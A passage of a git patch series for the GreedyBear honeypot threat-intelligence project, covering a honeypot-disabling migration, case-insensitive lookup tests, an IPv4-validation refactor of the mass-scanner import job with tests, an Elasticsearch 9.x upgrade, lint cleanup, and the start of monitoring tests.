+        "Ddospot",
+        "ssh-rsa",
+        "NGINX",
+    ]
+
+    for name in unwanted:
+        GeneralHoneypot.objects.get_or_create(
+            name=name,
+            defaults={"active": False},
+        )
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0026_fix_charfield_null_true"),
+    ]
+
+    operations = [
+        migrations.RunPython(
+            disable_unwanted_honeypots,
+            reverse_code=migrations.RunPython.noop,
+        ),
+    ]
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 2aa7526d..ad943656 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -136,17 +136,44 @@ def test_add_honeypot_to_ioc_multiple_honeypots(self):
         self.assertIn(hp2, ioc.general_honeypot.all())
 
     def test_existing_honeypots(self):
-        self.assertIn("Cowrie", self.repo._honeypot_cache)
-        self.assertIn("Log4pot", self.repo._honeypot_cache)
-        self.assertIn("Heralding", self.repo._honeypot_cache)
-        self.assertIn("Ciscoasa", self.repo._honeypot_cache)
-        self.assertIn("Ddospot", self.repo._honeypot_cache)
+        expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
+        for hp_name in expected_honeypots:
+            self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
 
     def test_is_ready_for_extraction_creates_and_enables(self):
         result = self.repo.is_ready_for_extraction("FooPot")
         self.assertTrue(result)
         self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
 
+    def test_is_ready_for_extraction_case_insensitive(self):
+        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        result = self.repo.is_ready_for_extraction("cowrie")
+        self.assertTrue(result)
+        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
+
+    def test_get_hp_by_name_insensitive(self):
+        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        result = self.repo.get_hp_by_name("cowrie")
+        self.assertIsNotNone(result)
+
+    def test_disabled_honeypot_case_insensitive(self):
+        GeneralHoneypot.objects.create(name="Heralding", active=False)
+
+        # reiniting repo after DB change to refresh the cache
+        repo = IocRepository()
+        result = repo.is_ready_for_extraction("heralding")
+        self.assertFalse(result)
+
+    def test_special_and_normal_honeypots(self):
+        GeneralHoneypot.objects.create(name="NormalPot", active=False)
+
+        repo = IocRepository()
+
+        self.assertTrue(repo.is_ready_for_extraction("cowrie"))
+        self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
+        self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
+        self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+
 
 class TestSensorRepository(CustomTestCase):
     def setUp(self):

From bdf1a1874f6fcc124957c40c64d5cb63005966fa Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 8 Jan 2026 20:52:35 +0530
Subject: [PATCH 34/75] fix: Refactor MassScannersCron to handle flexible IP
 formats. Closes #678 (#685)

* fix: refactor MassScannersCron to handle flexible IP formats

- Added is_valid_ipv4() utility function in extraction/utils.py for
  centralized IPv4 validation following DRY principle
- Refactored get_ioc_type() to use the new is_valid_ipv4() utility
- Updated MassScannersCron to use flexible regex pattern that
  extracts IP candidates and validates them programmatically
- Changed log level from WARNING to DEBUG for non-IP lines since
  external data sources naturally contain various formats (IPv6,
  plain IPs without comments, other strings)
- Added comprehensive tests for is_valid_ipv4() covering edge cases:
  * Valid IPs with/without whitespace
  * Out-of-range octets (>255)
  * Incomplete/malformed IPs
  * IPv6 addresses (correctly rejected)
  * Random strings and special characters
- Added MassScannersCron integration tests using real-world examples:
  * Plain IPs without comments
  * IPs with comments (various formats)
  * IPv6 addresses (should be skipped)
  * Invalid strings like /w00tw00t.at.ISC.SANS.DFind:)
  * Mixed valid/invalid data

All tests pass (67 total: 52 extraction utils + 15 mass scanners)

Fixes issues with 'unexpected line' warnings for valid data formats
that don't match the old strict regex pattern

* refactor: address code review feedback

- Remove redundant re.DOTALL flag from comment_regex
  Since we process line-by-line with iter_lines(), multi-line comments
  cannot occur (newlines are delimiters, not content). Flag is unnecessary.
- Move logging after save() to avoid misleading logs if DB operation fails
  Ensures we only log on successful database saves
---
 greedybear/cronjobs/extraction/utils.py |  27 ++-
 greedybear/cronjobs/mass_scanners.py    |  46 +++--
 tests/test_extraction_utils.py          | 129 ++++++++++++++
 tests/test_mass_scanners.py             | 227 ++++++++++++++++++++++++
 4 files changed, 410 insertions(+), 19 deletions(-)
 create mode 100644 tests/test_mass_scanners.py

diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index b176ec79..31de9e2d 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -131,6 +131,24 @@ def iocs_from_hits(hits: list[dict]) -> list[IOC]:
     return iocs
 
 
+def is_valid_ipv4(candidate: str) -> tuple[bool, str | None]:
+    """
+    Validate if a string is a valid IPv4 address.
+
+    Args:
+        candidate: String to validate as IPv4 address.
+
+    Returns:
+        Tuple of (is_valid, cleaned_ip). If valid, cleaned_ip is the stripped
+        IP address; otherwise, it is None.
+    """
+    try:
+        IPv4Address(candidate.strip())
+        return True, candidate.strip()
+    except ValueError:
+        return False, None
+
+
 def get_ioc_type(ioc: str) -> str:
     """
     Determine the type of an IOC based on its format.
@@ -141,13 +159,8 @@ def get_ioc_type(ioc: str) -> str:
     Returns:
         IP if the value is a valid IPv4 address, DOMAIN otherwise.
     """
-    try:
-        IPv4Address(ioc)
-    except ValueError:
-        ioc_type = DOMAIN
-    else:
-        ioc_type = IP
-    return ioc_type
+    is_valid, _ = is_valid_ipv4(ioc)
+    return IP if is_valid else DOMAIN
 
 
 def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> None:
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index 2a8a7275..b6bb65a4 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -3,12 +3,17 @@
 import requests
 
 from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_ipv4
 from greedybear.models import IOC, MassScanner
 
 
 class MassScannersCron(Cronjob):
     def run(self) -> None:
-        regex_compiled = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*#\s*(.+)*", re.DOTALL)
+        # Simple regex to extract potential IPv4 addresses
+        ip_candidate_regex = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
+        # Regex to extract optional comment/reason after '#'
+        comment_regex = re.compile(r"#\s*(.+)")
+
         r = requests.get(
             "https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt",
             timeout=10,
@@ -18,17 +23,34 @@ def run(self) -> None:
                 line = line_bytes.decode("utf-8")
                 if not line or line.startswith("#"):
                     continue
-                if match := re.match(regex_compiled, line):
-                    ip_address = match.group(1)
-                    reason = match.group(2)
-                    try:
-                        MassScanner.objects.get(ip_address=ip_address)
-                    except MassScanner.DoesNotExist:
-                        self.log.info(f"added new mass scanner {ip_address}")
-                        MassScanner(ip_address=ip_address, reason=reason).save()
-                        self._update_old_ioc(ip_address)
-                else:
-                    self.log.warning(f"unexpected line: {line}")
+
+                # Try to extract IP candidate from the line
+                ip_match = ip_candidate_regex.search(line)
+                if not ip_match:
+                    # No IP-like pattern found, log at DEBUG level
+                    self.log.debug(f"No IP pattern found in line: {line}")
+                    continue
+
+                # Validate the extracted candidate
+                is_valid, ip_address = is_valid_ipv4(ip_match.group(1))
+                if not is_valid:
+                    # Not a valid IPv4, log at DEBUG level
+                    self.log.debug(f"Invalid IPv4 address in line: {line}")
+                    continue
+
+                # Extract optional comment/reason
+                reason = ""
+                comment_match = comment_regex.search(line)
+                if comment_match:
+                    reason = comment_match.group(1)
+
+                # Add or update mass scanner entry
+                try:
+                    MassScanner.objects.get(ip_address=ip_address)
+                except MassScanner.DoesNotExist:
+                    self.log.info(f"added new mass scanner {ip_address}")
+                    MassScanner(ip_address=ip_address, reason=reason).save()
+                    self._update_old_ioc(ip_address)
 
     def _update_old_ioc(self, ip_address):
         try:
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 77a218a6..200794d7 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -6,6 +6,7 @@
     correct_ip_reputation,
     get_ioc_type,
     iocs_from_hits,
+    is_valid_ipv4,
     is_whatsmyip_domain,
     threatfox_submission,
 )
@@ -34,6 +35,134 @@ def test_invalid_ip_returns_domain(self):
         self.assertEqual(get_ioc_type("1.2.3"), DOMAIN)
 
 
+class TestIsValidIpv4(CustomTestCase):
+    def test_valid_ipv4_returns_true_and_cleaned_ip(self):
+        is_valid, ip = is_valid_ipv4("1.2.3.4")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "1.2.3.4")
+
+    def test_valid_ipv4_edge_cases(self):
+        # Test boundary values
+        is_valid, ip = is_valid_ipv4("0.0.0.0")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "0.0.0.0")
+
+        is_valid, ip = is_valid_ipv4("255.255.255.255")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "255.255.255.255")
+
+        is_valid, ip = is_valid_ipv4("192.168.1.1")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "192.168.1.1")
+
+    def test_ipv4_with_whitespace_strips_and_validates(self):
+        # Test leading whitespace
+        is_valid, ip = is_valid_ipv4("  1.2.3.4")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "1.2.3.4")
+
+        # Test trailing whitespace
+        is_valid, ip = is_valid_ipv4("1.2.3.4  ")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "1.2.3.4")
+
+        # Test both
+        is_valid, ip = is_valid_ipv4("  1.2.3.4  ")
+        self.assertTrue(is_valid)
+        self.assertEqual(ip, "1.2.3.4")
+
+    def test_invalid_ipv4_out_of_range_octets(self):
+        # Test octets > 255
+        is_valid, ip = is_valid_ipv4("256.1.1.1")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.256.1.1")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.1.256.1")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.1.1.256")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("999.999.999.999")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_incomplete_format(self):
+        # Too few octets
+        is_valid, ip = is_valid_ipv4("1.2.3")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.2")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_too_many_octets(self):
+        is_valid, ip = is_valid_ipv4("1.2.3.4.5")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_domains(self):
+        is_valid, ip = is_valid_ipv4("example.com")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("sub.example.com")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_ipv6_addresses(self):
+        # IPv6 should not be valid for IPv4 validation
+        is_valid, ip = is_valid_ipv4("2001:0db8:85a3::8a2e:0370:7334")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("::1")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_random_strings(self):
+        is_valid, ip = is_valid_ipv4("/w00tw00t.at.ISC.SANS.DFind:)")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("not an ip")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_special_characters(self):
+        is_valid, ip = is_valid_ipv4("1.2.3.4#comment")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.2.3.4 # comment")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+    def test_invalid_ipv4_negative_numbers(self):
+        is_valid, ip = is_valid_ipv4("-1.2.3.4")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+        is_valid, ip = is_valid_ipv4("1.-2.3.4")
+        self.assertFalse(is_valid)
+        self.assertIsNone(ip)
+
+
 class TestIsWhatsmyipDomain(CustomTestCase):
     def test_returns_true_for_known_domain(self):
         WhatsMyIPDomain.objects.create(domain="some.domain.com")
diff --git a/tests/test_mass_scanners.py b/tests/test_mass_scanners.py
new file mode 100644
index 00000000..278127ab
--- /dev/null
+++ b/tests/test_mass_scanners.py
@@ -0,0 +1,227 @@
+from unittest.mock import Mock, patch
+
+from greedybear.cronjobs.mass_scanners import MassScannersCron
+from greedybear.models import MassScanner
+
+from . import CustomTestCase
+
+
+class TestMassScannersCron(CustomTestCase):
+    def setUp(self):
+        self.cron = MassScannersCron()
+        self.cron.log = Mock()
+
+    def _create_mock_response(self, lines):
+        """Create a mock response object that iter_lines() can use."""
+        mock_response = Mock()
+        mock_response.iter_lines.return_value = [line.encode("utf-8") for line in lines]
+        return mock_response
+
+    def test_parses_ip_with_comment(self):
+        """Test parsing IP address with comment after #"""
+        lines = ["192.168.1.100 # normal comment"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # Should create a mass scanner entry
+        scanner = MassScanner.objects.get(ip_address="192.168.1.100")
+        self.assertEqual(scanner.reason, "normal comment")
+        self.cron.log.info.assert_called_once()
+
+    def test_parses_plain_ip_without_comment(self):
+        """Test parsing plain IP address without any comment"""
+        lines = ["45.83.67.252"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # Should create entry with empty reason
+        scanner = MassScanner.objects.get(ip_address="45.83.67.252")
+        self.assertEqual(scanner.reason, "")
+        self.cron.log.info.assert_called_once()
+
+    def test_parses_ip_with_multiple_hash_signs(self):
+        """Test parsing IP with comment containing # symbols"""
+        lines = ["1.1.1.1 # comment with # spaces"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        scanner = MassScanner.objects.get(ip_address="1.1.1.1")
+        self.assertEqual(scanner.reason, "comment with # spaces")
+
+    def test_parses_ip_without_space_before_comment(self):
+        """Test parsing IP with comment but no space before #"""
+        lines = ["1.1.1.1#comment_without_space"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        scanner = MassScanner.objects.get(ip_address="1.1.1.1")
+        self.assertEqual(scanner.reason, "comment_without_space")
+
+    def test_skips_ipv6_addresses(self):
+        """Test that IPv6 addresses are skipped (logged at DEBUG level)"""
+        lines = [
+            "2001:0db8:85a3::8a2e:0370:7334 # full IPv6",
+            "2001:db8::1 # compressed IPv6",
+            "fe80::1ff:fe23:4567:890a # link-local",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # Should not create any entries
+        self.assertEqual(MassScanner.objects.count(), 0)
+        # Should log at DEBUG level
+        self.assertEqual(self.cron.log.debug.call_count, 3)
+
+    def test_skips_invalid_strings(self):
+        """Test that invalid strings like URLs are skipped (logged at DEBUG)"""
+        lines = [
+            "/w00tw00t.at.ISC.SANS.DFind:)",
+            "<w00tw00t.at.blackhats.romanian.anti-sec:>",
+            "abc.def.ghi.jkl",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        self.assertEqual(MassScanner.objects.count(), 0)
+        self.assertEqual(self.cron.log.debug.call_count, 3)
+
+    def test_skips_invalid_ip_out_of_range(self):
+        """Test that IPs with octets >255 are skipped"""
+        lines = ["999.999.999.999 # structurally matches but invalid IP"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        self.assertEqual(MassScanner.objects.count(), 0)
+        self.cron.log.debug.assert_called_once()
+
+    def test_skips_comment_only_lines(self):
+        """Test that lines starting with # are skipped"""
+        lines = [
+            "# This is a comment",
+            "## Another comment",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        self.assertEqual(MassScanner.objects.count(), 0)
+        # Should not log anything (skipped before processing)
+        self.cron.log.debug.assert_not_called()
+
+    def test_skips_empty_lines(self):
+        """Test that empty lines are skipped"""
+        lines = ["", "  ", "\n"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        self.assertEqual(MassScanner.objects.count(), 0)
+
+    def test_handles_mixed_valid_and_invalid_lines(self):
+        """Test processing a mix of valid IPs, IPv6, and invalid strings"""
+        lines = [
+            "# Comment header",
+            "192.168.1.100 # normal comment",
+            "10.0.0.5#server",
+            "2001:db8::1 # IPv6 - should skip",
+            "/w00tw00t.at.ISC.SANS.DFind:)",
+            "45.83.67.252",
+            "999.999.999.999",
+            "193.142.146.101",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # Should only create 4 valid entries
+        self.assertEqual(MassScanner.objects.count(), 4)
+
+        # Verify the valid IPs were added
+        MassScanner.objects.get(ip_address="192.168.1.100")
+        MassScanner.objects.get(ip_address="10.0.0.5")
+        MassScanner.objects.get(ip_address="45.83.67.252")
+        MassScanner.objects.get(ip_address="193.142.146.101")
+
+    def test_does_not_duplicate_existing_entries(self):
+        """Test that existing mass scanner entries are not duplicated"""
+        # Create existing entry
+        MassScanner.objects.create(ip_address="1.2.3.4", reason="existing")
+
+        lines = ["1.2.3.4 # new comment"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # Should still only have one entry with original reason
+        self.assertEqual(MassScanner.objects.count(), 1)
+        scanner = MassScanner.objects.get(ip_address="1.2.3.4")
+        self.assertEqual(scanner.reason, "existing")
+        # Should not log "added new mass scanner"
+        self.cron.log.info.assert_not_called()
+
+    def test_parses_broadcast_and_special_ips(self):
+        """Test parsing special IPs like broadcast, localhost, etc."""
+        lines = [
+            "255.255.255.255 # broadcast",
+            "127.0.0.1 # localhost",
+            "0.0.0.0 # all interfaces",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # All are valid IPv4 addresses, so they should be added
+        self.assertEqual(MassScanner.objects.count(), 3)
+        MassScanner.objects.get(ip_address="255.255.255.255")
+        MassScanner.objects.get(ip_address="127.0.0.1")
+        MassScanner.objects.get(ip_address="0.0.0.0")
+
+    def test_handles_partial_ips(self):
+        """Test that incomplete IP addresses are skipped"""
+        lines = [
+            "192.168.1",
+            "123.456.78",
+            "1.2",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        self.assertEqual(MassScanner.objects.count(), 0)
+        # All should be logged at DEBUG level
+        self.assertEqual(self.cron.log.debug.call_count, 3)
+
+    def test_extracts_ip_from_beginning_of_line(self):
+        """Test that IP is correctly extracted when at start of line"""
+        lines = ["45.83.67.252"]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        scanner = MassScanner.objects.get(ip_address="45.83.67.252")
+        self.assertEqual(scanner.reason, "")
+
+    def test_handles_c_class_network_patterns(self):
+        """Test handling of IPs with prefix characters"""
+        lines = [
+            "C91.196.152.28 # probe.onyphe.net",
+            "C91.196.152.38 # probe.onyphe.net",
+        ]
+        with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+            mock_get.return_value = self._create_mock_response(lines)
+            self.cron.run()
+
+        # The regex should extract the valid IP part (91.196.152.28)
+        # even though there's a 'C' prefix
+        self.assertEqual(MassScanner.objects.count(), 2)
+        scanner1 = MassScanner.objects.get(ip_address="91.196.152.28")
+        scanner2 = MassScanner.objects.get(ip_address="91.196.152.38")
+        self.assertEqual(scanner1.reason, "probe.onyphe.net")
+        self.assertEqual(scanner2.reason, "probe.onyphe.net")

From f98362021508824febe5e485c6d50d82194be6dd Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Fri, 9 Jan 2026 12:57:41 +0100
Subject: [PATCH 35/75] Bump elasticsearch client to version 9.x. Closes #690
 (#691)

* update development container of elasticsearch

* bump elasticsearch version
---
 docker/elasticsearch.yml                    | 2 +-
 greedybear/cronjobs/repositories/elastic.py | 2 +-
 greedybear/settings.py                      | 2 +-
 requirements/project-requirements.txt       | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/docker/elasticsearch.yml b/docker/elasticsearch.yml
index deadb139..054c7449 100644
--- a/docker/elasticsearch.yml
+++ b/docker/elasticsearch.yml
@@ -4,7 +4,7 @@ services:
       - elasticsearch
 
   elasticsearch:
-    image: docker.elastic.co/elasticsearch/elasticsearch:8.15.0
+    image: docker.elastic.co/elasticsearch/elasticsearch:9.2.3
     environment:
       - "discovery.type=single-node"
 
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index e62cdc48..e3b24b18 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -2,7 +2,7 @@
 from datetime import datetime, timedelta
 
 from django.conf import settings
-from elasticsearch8.dsl import Q, Search
+from elasticsearch.dsl import Q, Search
 
 from greedybear.consts import REQUIRED_FIELDS
 from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
diff --git a/greedybear/settings.py b/greedybear/settings.py
index f9c592b8..e07cdfdf 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -6,7 +6,7 @@
 from datetime import timedelta
 
 from django.core.management.utils import get_random_secret_key
-from elasticsearch8 import Elasticsearch
+from elasticsearch import Elasticsearch
 
 BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
 BASE_STATIC_PATH = os.path.join(BASE_DIR, "static/")
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index bf6f63a3..9c1ed53a 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,7 +1,7 @@
 celery==5.6.2
 
 # if you change this, update the documentation
-elasticsearch8==8.19.3
+elasticsearch==9.2.1
 
 Django==5.2.10
 djangorestframework==3.16.1

From f3553653843989a891424fa58a0276c6bf472a30 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Fri, 9 Jan 2026 20:04:03 +0530
Subject: [PATCH 36/75] refactor: cleanup ruff ignores and fix N818. Closes
 #640 (#692)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* refactor: cleanup ruff ignores and fix N818

- Rename ElasticServerDownException → ElasticServerDownError (N818)
- Remove N804, N818, UP008, UP031 from ignores as they are fixed
- Codebase is now compliant with these rules

* refactor: cleanup ruff ignores, fix N818 and C408

- Rename ElasticServerDownException → ElasticServerDownError (N818)
- Replace dict() with {} (C408)
- Remove N804, N818, UP008, UP031, C401, C408 from ignores
- Codebase is now compliant with these rules
- Verified all checks pass with explicit config
---
 .github/configurations/python_linters/.ruff.toml | 13 -------------
 api/views/utils.py                               |  2 +-
 greedybear/cronjobs/repositories/elastic.py      | 10 +++++-----
 tests/test_repositories.py                       |  2 +-
 4 files changed, 7 insertions(+), 20 deletions(-)

diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index 3b513404..12daab7d 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -53,19 +53,6 @@ select = [
 ignore = [
     # F403: Allow wildcard imports in __init__.py files
     "F403",
-    # C401/C408: Allow dict() and generator patterns (style preference)
-    "C401",
-    "C408",
     # E501: Allow long lines in docstrings
     "E501",
-
-    # N804: Allow 'self' in class methods for Django test compatibility
-    "N804",
-
-    # N818: Allow existing exception naming
-    "N818",
-    # UP008: Allow explicit super() in tests for clarity
-    "UP008",
-    # UP031: Allow old-style % formatting in tests
-    "UP031",
 ]
diff --git a/api/views/utils.py b/api/views/utils.py
index 7d4d8c66..87face9d 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -80,7 +80,7 @@ def __init__(self, query_params: dict):
 
     def apply_default_filters(self, query_params):
         if not query_params:
-            query_params = dict()
+            query_params = {}
         if "include_mass_scanners" not in query_params:
             self.exclude_reputation.append("mass scanner")
         if "include_tor_exit_nodes" not in query_params:
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index e3b24b18..6895472d 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -18,7 +18,7 @@ class ElasticRepository:
     This class is intended for individual extraction runs, so the cache never clears.
     """
 
-    class ElasticServerDownException(Exception):
+    class ElasticServerDownError(Exception):
         """Raised when the Elasticsearch server is unreachable."""
 
         pass
@@ -27,7 +27,7 @@ def __init__(self):
         """Initialize the repository with an Elasticsearch client and empty cache."""
         self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
         self.elastic_client = settings.ELASTIC_CLIENT
-        self.search_cache = dict()
+        self.search_cache = {}
 
     def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str) -> bool:
         """
@@ -62,7 +62,7 @@ def search(self, minutes_back_to_lookup: int) -> list:
             list: Log entries sorted by @timestamp, containing only REQUIRED_FIELDS.
 
         Raises:
-            ElasticServerDownException: If Elasticsearch is unreachable.
+            ElasticServerDownError: If Elasticsearch is unreachable.
         """
         if minutes_back_to_lookup in self.search_cache:
             self.log.debug("fetching elastic search result from cache")
@@ -120,11 +120,11 @@ def _healthcheck(self):
         Verify Elasticsearch connectivity.
 
         Raises:
-            ElasticServerDownException: If the server does not respond to ping.
+            ElasticServerDownError: If the server does not respond to ping.
         """
         self.log.debug("performing healthcheck")
         if not self.elastic_client.ping():
-            raise self.ElasticServerDownException("elastic server is not reachable, could be down")
+            raise self.ElasticServerDownError("elastic server is not reachable, could be down")
         self.log.debug("elastic server is reachable")
 
 
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index ad943656..7544f232 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -376,7 +376,7 @@ def test_healthcheck_passes_when_ping_succeeds(self):
 
     def test_healthcheck_raises_when_ping_fails(self):
         self.mock_client.ping.return_value = False
-        with self.assertRaises(ElasticRepository.ElasticServerDownException) as ctx:
+        with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
             self.repo._healthcheck()
         self.assertIn("not reachable", str(ctx.exception))
 

From 5e5678d9d000d5507aeb51e3d859a967f291e7e4 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Sat, 10 Jan 2026 22:14:33 +0530
Subject: [PATCH 37/75] Tests(Cronjobs): Adding tests for MonitorLogs and
 MonitorHoneyPots. (#669)

* Adding tests for MonitorLogs and MonitorHoneyPots.

* running linters

* Rewriting tests so they can be decoupled.

* Add tests for monitor logs and monitor honeypots

* removing unused import
---
 .../cronjobs/test_monitor_honeypots.py        | 70 +++++++++++++++++
 .../greedybear/cronjobs/test_monitor_logs.py  | 78 +++++++++++++++++++
 2 files changed, 148 insertions(+)
 create mode 100644 tests/greedybear/cronjobs/test_monitor_honeypots.py
 create mode 100644 tests/greedybear/cronjobs/test_monitor_logs.py

diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
new file mode 100644
index 00000000..b4482eac
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -0,0 +1,70 @@
+from unittest.mock import MagicMock, patch
+
+from django.test import TestCase
+from greedybear.cronjobs.monitor_honeypots import MonitorHoneypots
+from greedybear.models import GeneralHoneypot
+
+
+class MonitorHoneypotsTestCase(TestCase):
+    def setUp(self):
+        """Creating two honeypots in the database for testing."""
+        self.honeypot1 = GeneralHoneypot.objects.create(name="Log4pot", active=True)
+        self.honeypot2 = GeneralHoneypot.objects.create(name="Cowrie", active=True)
+
+    @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+    def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
+        # Setup mock responses
+        mock_elastic_repo = mock_elastic_repo_class.return_value
+
